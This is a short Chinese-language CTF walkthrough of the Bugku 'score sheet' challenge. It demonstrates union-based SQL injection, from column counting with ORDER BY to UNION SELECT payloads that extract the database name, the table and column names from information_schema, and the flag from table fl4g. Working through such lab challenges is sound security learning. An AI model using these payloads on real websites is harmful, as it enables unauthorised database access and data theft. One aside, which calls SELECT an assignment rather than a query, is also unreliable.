bugku成绩单

bugku成绩单详细解析

1，我们首先分别输入1,2,3，
均有输出
我们输入1’
没有回响
因此我们可以判断存在sql注入
2.我们分别输入

1' order by 1#
1' order by 2#
1' order by 3#
1' order by 4#

均有回响
但是当我们使用

1' order by 5#

时，没有回响
因此我们可以根据此判断字段数为4
3，
之后就是最精彩的地方了
之后我们联合查询
我们先输入
注意（select好像tm的不是查询，，好像是赋值。。）

1' union select 1,2,3,4#

没有显示有用的东西
因为id=1 所以我们的东西被覆盖
因此呢
我们输入

5' union select 1,2,3,database()#

即设置一个新的id，我们要select的值会显示在表上（覆盖）
bugku成绩单
现在我们得到了一个数据库的名字
之后就进行爆表
5’union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到
之后再进行获得里面的列
’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=‘fl4g’#
得到
bugku成绩单我们得到了列
之后我们获取我们要得到的东西
5’ union select 1,2,3,skctf_flag from fl4g#
得到flag

之后我会写一些关于sql语句的总结

bugku成绩单 详细解析

相关推荐

bugku成绩单详细解析